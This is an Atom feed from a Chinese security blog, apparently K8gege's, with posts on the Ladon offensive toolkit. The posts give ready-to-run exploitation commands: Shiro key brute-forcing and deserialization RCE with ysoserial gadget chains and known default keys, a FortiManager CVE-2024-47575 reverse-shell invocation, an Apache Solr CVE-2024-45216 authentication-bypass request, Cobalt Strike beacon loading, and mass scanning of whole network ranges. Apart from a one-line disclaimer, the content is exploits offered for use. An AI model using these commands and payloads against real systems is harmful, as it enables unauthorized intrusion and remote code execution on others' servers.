-
Notifications
You must be signed in to change notification settings - Fork 12
/
Copy pathatom.xml
626 lines (326 loc) · 162 KB
/
atom.xml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
<title>K8哥哥’s Blog</title>
<link href="/atom.xml" rel="self"/>
<link href="http://k8gege.org/"/>
<updated>2025-01-25T03:29:43.450Z</updated>
<id>http://k8gege.org/</id>
<author>
<name>K8gege</name>
</author>
<generator uri="https://hexo.io/">Hexo</generator>
<entry>
<title>Ladon ShiroEXP高效爆破Key 反序列化漏洞复现</title>
<link href="http://k8gege.org/p/shiroexp.html"/>
<id>http://k8gege.org/p/shiroexp.html</id>
<published>2024-12-10T15:40:00.000Z</published>
<updated>2025-01-25T03:29:43.450Z</updated>
<content type="html"><![CDATA[<p style="color:#fff;"> <% <span class="archive-article-date">Visit <span id="busuanzi_value_page_pv"></span>%></%></p><p>Ladon ShiroEXP 高效爆破Key Shiro反序列化漏洞复现</p><h3 id="功能简介"><a href="#功能简介" class="headerlink" title="功能简介"></a>功能简介</h3><p>支持执行自定义payload (ysoserial)一键爆破Shiro Key 自动CBC/GCM 支持keys.txt多线程检测1100+仅需几十秒一键检测 反序列化 利用链Shiro高版本GCM回显命令执行(不出网)Shiro低版本CBC回显命令执行(不出网)输出ShiroExp.log</p><p>命令执行-回显利用链<br>CommonsCollectionsK2<br>CommonsBeanutils2<br>Jdk7u21<br>Jdk8u20<br>CommonsBeanutils1<br>CommonsCollectionsK1</p><p></p><h3 id="Shiro反序列化漏洞原理"><a href="#Shiro反序列化漏洞原理" class="headerlink" title="Shiro反序列化漏洞原理"></a>Shiro反序列化漏洞原理</h3><p>由于Apache Shiro cookie中通过 AES-128-CBC、AES-128-GCM 模式加密的rememberMe字段存在问题,用户可通过Padding Oracle 加密生成的攻击代码来构造恶意的rememberMe字段,并重新请求网站,进行反序列化攻击,最终导致任意代码执行。</p><h3 id="爆破Shiro-Key"><a href="#爆破Shiro-Key" class="headerlink" title="爆破Shiro Key"></a>爆破Shiro Key</h3><p>内置1000+默认Key,多线程一键爆破(自动AES、GCM加密),几秒验证<br>支持对Shiro-550(硬编码秘钥)和Shiro-721(Padding Oracle)的一键化检测</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Ladon ShiroExp http://192.168.1.8 check</span><br><span class="line">Ladon ShiroKey http://192.168.1.8</span><br></pre></td></tr></table></figure><p><img alt="image" data-original="https://k8gege.org/k8img/Ladon/exp/shiro/key.png"></p><p><img alt="image" data-original="https://k8gege.org/k8img/Ladon/exp/shiro/key2.png"></p><h3 id="爆破利用链"><a href="#爆破利用链" class="headerlink" title="爆破利用链"></a>爆破利用链</h3><p>内置1000+默认Key,多线程一键爆破(自动AES-CBC、AES-GCM加密),几秒验证</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Ladon ShiroExp http://192.168.1.8 zSyK5Kp6PZAAjlT+eeNMlg== cbc check</span><br><span class="line">Ladon ShiroExp http://192.168.1.8 zSyK5Kp6PZAAjlT+eeNMlg== gcm check</span><br></pre></td></tr></table></figure><p><img alt="image" data-original="https://k8gege.org/k8img/Ladon/exp/shiro/gadget.png"></p><h3 id="ShiroEXP-漏洞利用"><a href="#ShiroEXP-漏洞利用" class="headerlink" title="ShiroEXP 漏洞利用"></a>ShiroEXP 漏洞利用</h3><p>使用爆破出来的对应利用链,无回显执行命令</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Ladon ShiroExp http://192.168.1.8 zSyK5Kp6PZAAjlT+eeNMlg== cbc CommonsBeanutils1 whoami</span><br><span class="line">Ladon ShiroExp http://192.168.1.8 zSyK5Kp6PZAAjlT+eeNMlg== gcm CommonsBeanutils1 whoami</span><br></pre></td></tr></table></figure><p><img alt="image" data-original="https://k8gege.org/k8img/Ladon/exp/shiro/exp.png"></p><h3 id="Rouyi-4-x漏洞利用"><a href="#Rouyi-4-x漏洞利用" class="headerlink" title="Rouyi 4.x漏洞利用"></a>Rouyi 4.x漏洞利用</h3><p>Rouyi4Exp只针对4.X默认Key(zSyK5Kp6PZAAjlT+eeNMlg==),利用链CommonsBeanutils1的一键利用。对于其它版本,最好还是使用ShiroExp模块,这个针对所有使用Shiro框架的CMS</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Ladon Rouyi4Exp http://192.168.1.8 whoami</span><br><span class="line">Ladon ShiroExp http://192.168.1.8 zSyK5Kp6PZAAjlT+eeNMlg== cbc CommonsBeanutils1 whoami</span><br><span class="line">Ladon ShiroExp http://192.168.1.8 zSyK5Kp6PZAAjlT+eeNMlg== gcm CommonsBeanutils1 whoami</span><br></pre></td></tr></table></figure><p><img alt="image" data-original="https://k8gege.org/k8img/Ladon/exp/shiro/Rouyi4Exp.png"></p><h3 id="执行自定义payload"><a href="#执行自定义payload" class="headerlink" title="执行自定义payload"></a>执行自定义payload</h3><h4 id="ysoserial生成payload"><a href="#ysoserial生成payload" class="headerlink" title="ysoserial生成payload"></a>ysoserial生成payload</h4><p>Shiro利用链CommonsBeanutils1,所以payload必须使用CommonsBeanutils1封装,并不是任意class都能执行,要不然还爆破利用链的干嘛?因为目标引用了这个库,才能反序列化执行命令,并不是单纯知道KEY,就能执行。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">java -jar ysoserial.jar CommonsBeanutils1 <span class="string">"touch /tmp/k8gege.txt"</span> > yso.ser</span><br></pre></td></tr></table></figure><p>使用对应KEY 对应加密方式 执行payload 如shiro低版本 AES-CBC对应KEY加密,再发送加密后的cookie,所以这是为什么直接抓别人包,发送YSO生成payload无效的原因,一定要了解整个EXP通信原理,而不是表面理解,只知道通过remberME字段反序列化,可是让自己构造个payload,都不知道要封装成对应的,随意找个class当然不行啊,除非是原生JAVA,且支持所有java版本的class,明显没有,存在通用反序化payload的话就不需要ysoserial工具了。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Ladon ShiroExp http://192.168.50.223:8080 kPH+bIxk5D2deZiIxcaaaA== cbc diy yso.ser</span><br></pre></td></tr></table></figure><h4 id="检测是否执行成功"><a href="#检测是否执行成功" class="headerlink" title="检测是否执行成功"></a>检测是否执行成功</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">Ladon ShiroExp http://192.168.50.223:8080 kPH+bIxk5D2deZiIxcaaaA== cbc CommonsCollectionsK1 <span class="string">"ls /tmp"</span></span><br><span class="line"></span><br><span class="line">http://192.168.50.223:8080 IsShiro</span><br><span class="line">Exp...</span><br><span class="line">Res:</span><br><span class="line">hsperfdata_root</span><br><span class="line">k8gege.txt ---</span><br><span class="line">tomcat-docbase.6132634819123728545.8080</span><br><span class="line">tomcat.2080411627486188816.8080</span><br></pre></td></tr></table></figure><h4 id="影响版本"><a href="#影响版本" class="headerlink" title="影响版本"></a>影响版本</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Apache Shiro < 1.2.4</span><br><span class="line"></span><br><span class="line">RuoYi 版本号 对象版本的默认AES密钥</span><br><span class="line">4.6.1-4.3.1 zSyK5Kp6PZAAjlT+eeNMlg==</span><br><span class="line">3.4-及以下 fCq+/xW488hMTCD+cmJ3aQ==</span><br></pre></td></tr></table></figure><h3 id="Shiro框架检测"><a href="#Shiro框架检测" class="headerlink" title="Shiro框架检测"></a>Shiro框架检测</h3><p>模块IsShiro,Cobalt Strike下命令用法一致,但无需上传EXE至目标,内存加载,隐蔽性高</p><h3 id="指定URL"><a href="#指定URL" class="headerlink" title="指定URL"></a>指定URL</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Ladon http://192.168.1.8 IsShiro</span><br></pre></td></tr></table></figure><h3 id="指定IP"><a href="#指定IP" class="headerlink" title="指定IP"></a>指定IP</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Ladon 192.168.1.8 IsShiro</span><br></pre></td></tr></table></figure><h3 id="批量URL"><a href="#批量URL" class="headerlink" title="批量URL"></a>批量URL</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Ladon url.txt IsShiro</span><br></pre></td></tr></table></figure><p>PS:TXT可存放IP、IP:Port、URL等格式</p><h3 id="批量IP"><a href="#批量IP" class="headerlink" title="批量IP"></a>批量IP</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Ladon ip.txt IsShiro</span><br><span class="line">Ladon noping ip.txt IsShiro</span><br></pre></td></tr></table></figure><h3 id="指定C段"><a href="#指定C段" class="headerlink" title="指定C段"></a>指定C段</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Ladon 192.168.1.8/24 IsShiro</span><br><span class="line">Ladon noping 192.168.1.8/24 IsShiro</span><br><span class="line"></span><br><span class="line">Ladon 192.168.1.8/24 IsShiro</span><br><span class="line">Ladon noping 192.168.1.8/24 IsShiro</span><br></pre></td></tr></table></figure><h3 id="指定B段"><a href="#指定B段" class="headerlink" title="指定B段"></a>指定B段</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Ladon 192.168.1.8/b IsShiro</span><br><span class="line">Ladon noping 192.168.1.8/b IsShiro</span><br><span class="line"></span><br><span class="line">Ladon 192.168.1.8/b IsShiro</span><br><span class="line">Ladon noping 192.168.1.8/b IsShiro</span><br></pre></td></tr></table></figure><h3 id="指定A段"><a href="#指定A段" class="headerlink" title="指定A段"></a>指定A段</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Ladon 192.168.1.8/a IsShiro</span><br><span class="line">Ladon noping 192.168.1.8/a IsShiro</span><br><span class="line"></span><br><span class="line">Ladon 192.168.1.8/a IsShiro</span><br><span class="line">Ladon noping 192.168.1.8/a IsShiro</span><br></pre></td></tr></table></figure><h3 id="批量C段"><a href="#批量C段" class="headerlink" title="批量C段"></a>批量C段</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Ladon ip24.txt IsShiro</span><br><span class="line">Ladon ipc.txt IsShiro</span><br><span class="line"></span><br><span class="line">Ladon noping ip24.txt IsShiro</span><br><span class="line">Ladon noping ipc.txt IsShiro</span><br></pre></td></tr></table></figure><p>PS: TXT存放多个目标的C段IP</p><h3 id="批量B段"><a href="#批量B段" class="headerlink" title="批量B段"></a>批量B段</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Ladon ip16.txt IsShiro</span><br><span class="line">Ladon noping ip16.txt IsShiro</span><br></pre></td></tr></table></figure><p>PS: TXT存放多个目标的B段IP</p><h3 id="批量网段"><a href="#批量网段" class="headerlink" title="批量网段"></a>批量网段</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Ladon cidr.txt IsShiro</span><br><span class="line">Ladon noping cidr.txt IsShiro</span><br></pre></td></tr></table></figure><p>PS: TXT存放各种IP网段,全网无差别扫描</p><h3 id="更多功能-使用教程"><a href="#更多功能-使用教程" class="headerlink" title="更多功能 使用教程"></a>更多功能 使用教程</h3><p><a href="http://k8gege.org/Ladon/">http://k8gege.org/Ladon/</a></p>]]></content>
<summary type="html">
<p style="color:#fff;">
<% <span class="archive-article-date">
Visit <span id="busuanzi_value_page_pv"></span>
%>
</%></p>
<p>Ladon Shir
</summary>
<category term="Ladon" scheme="http://k8gege.org/categories/Ladon/"/>
<category term="EXP" scheme="http://k8gege.org/categories/EXP/"/>
<category term="EXP" scheme="http://k8gege.org/tags/EXP/"/>
<category term="Shiro" scheme="http://k8gege.org/tags/Shiro/"/>
</entry>
<entry>
<title>FortiManager CVE-2024-47575 RCE漏洞复现</title>
<link href="http://k8gege.org/p/CVE-2024-47575.html"/>
<id>http://k8gege.org/p/CVE-2024-47575.html</id>
<published>2024-11-20T15:40:00.000Z</published>
<updated>2024-11-28T15:32:43.778Z</updated>
<content type="html"><![CDATA[<p style="color:#fff;"> <% <span class="archive-article-date">Visit <span id="busuanzi_value_page_pv"></span>%></%></p><p>Ladon信息收集、资产探测、WhatCMS识别 飞塔FortiManager</p><p><img alt="image" data-original="https://k8gege.org/k8img/Ladon/cms/fortimanager.png"></p><h3 id="cve-2024-47575-漏洞复现-反弹Shell"><a href="#cve-2024-47575-漏洞复现-反弹Shell" class="headerlink" title="cve-2024-47575 漏洞复现 反弹Shell"></a>cve-2024-47575 漏洞复现 反弹Shell</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">LadonGUI---NetCat---监听4444</span><br><span class="line">python CVE-2024-47575.py --target 192.168.1.110 --lhost 192.168.1.8 --lport 4444 --action exploit</span><br></pre></td></tr></table></figure><p><img alt="image" data-original="https://k8gege.org/k8img/Ladon/exp/cve_2024_47575.png"></p><h4 id="影响版本"><a href="#影响版本" class="headerlink" title="影响版本"></a>影响版本</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">FortiManager 7.6.0</span><br><span class="line">FortiManager 7.4.0 through 7.4.4</span><br><span class="line">FortiManager 7.2.0 through 7.2.7</span><br><span class="line">FortiManager 7.0.0 through 7.0.12</span><br><span class="line">FortiManager 6.4.0 through 6.4.14</span><br><span class="line">FortiManager 6.2.0 through 6.2.12</span><br><span class="line">FortiManager Cloud 7.4.1 through 7.4.4</span><br><span class="line">FortiManager Cloud 7.2.1 through 7.2.7</span><br><span class="line">FortiManager Cloud 7.0.1 through 7.0.12</span><br><span class="line">FortiManager Cloud 6.4</span><br></pre></td></tr></table></figure><p><a href="https://github.com/watchtowrlabs/Fortijump-Exploit-CVE-2024-47575" target="_blank" rel="noopener">https://github.com/watchtowrlabs/Fortijump-Exploit-CVE-2024-47575</a></p><h3 id="模块名称"><a href="#模块名称" class="headerlink" title="模块名称"></a>模块名称</h3><p>WhatCMS、CMS、CmsInfo等,Cobalt Strike下用法一致,输入URL,仅识别URL对应指纹,输入非URL时,会探测常见CMS网站、网络设备、打印机、路由器、防火墙、VPN等,由于端口多速度慢,但收集的资产会更全(前提是目标有)</p><h3 id="指定URL"><a href="#指定URL" class="headerlink" title="指定URL"></a>指定URL</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Ladon http://192.168.1.8 CMS</span><br><span class="line">Ladon http://192.168.1.8 WhatCMS</span><br></pre></td></tr></table></figure><h3 id="指定IP"><a href="#指定IP" class="headerlink" title="指定IP"></a>指定IP</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Ladon 192.168.1.8 CMS</span><br><span class="line">Ladon 192.168.1.8 WhatCMS</span><br></pre></td></tr></table></figure><h3 id="批量URL"><a href="#批量URL" class="headerlink" title="批量URL"></a>批量URL</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Ladon url.txt CMS</span><br></pre></td></tr></table></figure><p>PS:TXT可存放IP、IP:Port、URL等格式</p><h3 id="批量IP"><a href="#批量IP" class="headerlink" title="批量IP"></a>批量IP</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Ladon ip.txt WhatCMS</span><br><span class="line">Ladon noping ip.txt CMS</span><br></pre></td></tr></table></figure><h3 id="指定C段"><a href="#指定C段" class="headerlink" title="指定C段"></a>指定C段</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Ladon 192.168.1.8/24 WhatCMS</span><br><span class="line">Ladon noping 192.168.1.8/24 CMS</span><br><span class="line"></span><br><span class="line">Ladon 192.168.1.8/24 WhatCMS</span><br><span class="line">Ladon noping 192.168.1.8/24 CMS</span><br></pre></td></tr></table></figure><h3 id="指定B段"><a href="#指定B段" class="headerlink" title="指定B段"></a>指定B段</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Ladon 192.168.1.8/b WhatCMS</span><br><span class="line">Ladon noping 192.168.1.8/b CMS</span><br><span class="line"></span><br><span class="line">Ladon 192.168.1.8/b WhatCMS</span><br><span class="line">Ladon noping 192.168.1.8/b CMS</span><br></pre></td></tr></table></figure><h3 id="指定A段"><a href="#指定A段" class="headerlink" title="指定A段"></a>指定A段</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Ladon 192.168.1.8/a WhatCMS</span><br><span class="line">Ladon noping 192.168.1.8/a CMS</span><br><span class="line"></span><br><span class="line">Ladon 192.168.1.8/a CMS</span><br><span class="line">Ladon noping 192.168.1.8/a CMS</span><br></pre></td></tr></table></figure><h3 id="批量C段"><a href="#批量C段" class="headerlink" title="批量C段"></a>批量C段</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Ladon ip24.txt CMS</span><br><span class="line">Ladon ipc.txt CMS</span><br><span class="line"></span><br><span class="line">Ladon noping ip24.txt CMS</span><br><span class="line">Ladon noping ipc.txt CMS</span><br></pre></td></tr></table></figure><p>PS: TXT存放多个目标的C段IP</p><h3 id="批量B段"><a href="#批量B段" class="headerlink" title="批量B段"></a>批量B段</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Ladon ip16.txt CMS</span><br><span class="line">Ladon noping ip16.txt CMS</span><br></pre></td></tr></table></figure><p>PS: TXT存放多个目标的B段IP</p><h3 id="批量网段"><a href="#批量网段" class="headerlink" title="批量网段"></a>批量网段</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Ladon cidr.txt CMS</span><br><span class="line">Ladon noping cidr.txt CMS</span><br></pre></td></tr></table></figure><p>PS: TXT存放各种IP网段,全网无差别扫描</p><h3 id="更多功能-使用教程"><a href="#更多功能-使用教程" class="headerlink" title="更多功能 使用教程"></a>更多功能 使用教程</h3><p><a href="http://k8gege.org/Ladon/">http://k8gege.org/Ladon/</a></p>]]></content>
<summary type="html">
<p style="color:#fff;">
<% <span class="archive-article-date">
Visit <span id="busuanzi_value_page_pv"></span>
%>
</%></p>
<p>Ladon信息收集、
</summary>
<category term="Ladon" scheme="http://k8gege.org/categories/Ladon/"/>
<category term="EXP" scheme="http://k8gege.org/categories/EXP/"/>
<category term="CVE-2024-47575" scheme="http://k8gege.org/tags/CVE-2024-47575/"/>
<category term="FortiManager" scheme="http://k8gege.org/tags/FortiManager/"/>
</entry>
<entry>
<title>LadonExp CVE-2024-45216 漏洞复现批量扫描教程</title>
<link href="http://k8gege.org/p/CVE-2024-45216.html"/>
<id>http://k8gege.org/p/CVE-2024-45216.html</id>
<published>2024-11-01T15:40:00.000Z</published>
<updated>2024-11-14T15:02:48.328Z</updated>
<content type="html"><![CDATA[<h1 id="Ladon-CVE-2024-45216-影响版本-Apache-Solr-5-3-0-lt-Apache-Solr-lt-8-11-4-9-0-0-lt-Apache-Solr-lt-9-7-0"><a href="#Ladon-CVE-2024-45216-影响版本-Apache-Solr-5-3-0-lt-Apache-Solr-lt-8-11-4-9-0-0-lt-Apache-Solr-lt-9-7-0" class="headerlink" title="Ladon CVE-2024-45216 影响版本 Apache Solr 5.3.0 <= Apache Solr < 8.11.4 9.0.0 <= Apache Solr < 9.7.0"></a>Ladon CVE-2024-45216 影响版本 Apache Solr 5.3.0 <= Apache Solr < 8.11.4 9.0.0 <= Apache Solr < 9.7.0</h1><p>+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++</p><script language="javascript" type="text/javascript">window.location.href="http://k8gege.org/Ladon/CVE-2024-45216.html";</script><p>LadonEXP一键生成Poc/Exp,批量漏洞挖掘,快速获取权限。使用Ladon可对C段、B段、A段、全网批量扫描,0day/1day/Nday快速利用。</p><h3 id="免责声明"><a href="#免责声明" class="headerlink" title="免责声明"></a>免责声明</h3><p>Ladon项目所涉及的技术、思路和工具仅供学习或授权渗透,非法用途后果自负。</p><h3 id="漏洞编号"><a href="#漏洞编号" class="headerlink" title="漏洞编号"></a>漏洞编号</h3><p>CVE-2024-45216</p><h3 id="影响版本"><a href="#影响版本" class="headerlink" title="影响版本"></a>影响版本</h3><p>Apache Solr 5.3.0 <= Apache Solr < 8.11.4 9.0.0 <= Apache Solr < 9.7.0</p><h3 id="应用指纹"><a href="#应用指纹" class="headerlink" title="应用指纹"></a>应用指纹</h3><p>app=”Apache Solr”</p><h3 id="漏洞简介"><a href="#漏洞简介" class="headerlink" title="漏洞简介"></a>漏洞简介</h3><p>Apache Solr 5.3.0至8.11.4之前版本和9.0.0至9.7.0之前版本存在安全漏洞,该漏洞源于存在身份验证不当漏洞,从而可使用虚假URL路径结尾绕过身份验证。</p><h3 id="Payload"><a href="#Payload" class="headerlink" title="Payload"></a>Payload</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">GET /solr/admin/info/properties:/admin/info/key</span><br><span class="line">Host: 192.168.1.8</span><br><span class="line">User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0</span><br><span class="line">Content-Type: application/x-www-form-urlencoded</span><br></pre></td></tr></table></figure><p>PS: 使用LadonExp填上对应内容,即可生成POC/EXP</p><h3 id="POC独立使用"><a href="#POC独立使用" class="headerlink" title="POC独立使用"></a>POC独立使用</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">CVE-2024-45216.exe http://192.168.1.8</span><br></pre></td></tr></table></figure><p>PS: 部分https站点需Ladon调用扫描</p><p><img alt="image" data-original="https://k8gege.org/k8img/Ladon/exp/CVE-2024-45216/poc.png"></p><h3 id="EXP执行命令"><a href="#EXP执行命令" class="headerlink" title="EXP执行命令"></a>EXP执行命令</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">CVE-2024-45216.exe http://192.168.1.8 whoami</span><br></pre></td></tr></table></figure><p>PS: 将payload中的cmd命令如whoami替换成$cmd$ 即可生成EXP</p><h3 id="CS使用POC"><a href="#CS使用POC" class="headerlink" title="CS使用POC"></a>CS使用POC</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">beacon> execute-assembly C:\Ladon\CVE-2024-45216.exe http://192.168.1.8</span><br></pre></td></tr></table></figure><p>PS: Cobalt Strike内存加载CVE-2024-45216.exe</p><h3 id="指定URL"><a href="#指定URL" class="headerlink" title="指定URL"></a>指定URL</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Ladon http://192.168.1.8 CVE-2024-45216.exe</span><br><span class="line">Ladon http://192.168.1.8 CVE-2024-45216.dll</span><br></pre></td></tr></table></figure><h3 id="指定IP"><a href="#指定IP" class="headerlink" title="指定IP"></a>指定IP</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Ladon 192.168.1.8 CVE-2024-45216.exe</span><br><span class="line">Ladon 192.168.1.8 CVE-2024-45216.dll</span><br></pre></td></tr></table></figure><h3 id="批量URL"><a href="#批量URL" class="headerlink" title="批量URL"></a>批量URL</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Ladon url.txt CVE-2024-45216.exe</span><br></pre></td></tr></table></figure><p>PS:TXT可存放IP、IP:Port、URL等格式</p><p><img alt="image" data-original="https://k8gege.org/k8img/Ladon/exp/CVE-2024-45216/vul.png"></p><h3 id="批量IP"><a href="#批量IP" class="headerlink" title="批量IP"></a>批量IP</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Ladon ip.txt CVE-2024-45216.exe</span><br><span class="line">Ladon noping ip.txt CVE-2024-45216.exe</span><br></pre></td></tr></table></figure><h3 id="指定C段"><a href="#指定C段" class="headerlink" title="指定C段"></a>指定C段</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Ladon 192.168.1.8/24 CVE-2024-45216.exe</span><br><span class="line">Ladon noping 192.168.1.8/24 CVE-2024-45216.exe</span><br><span class="line"></span><br><span class="line">Ladon 192.168.1.8/24 CVE-2024-45216.dll</span><br><span class="line">Ladon noping 192.168.1.8/24 CVE-2024-45216.dll</span><br></pre></td></tr></table></figure><h3 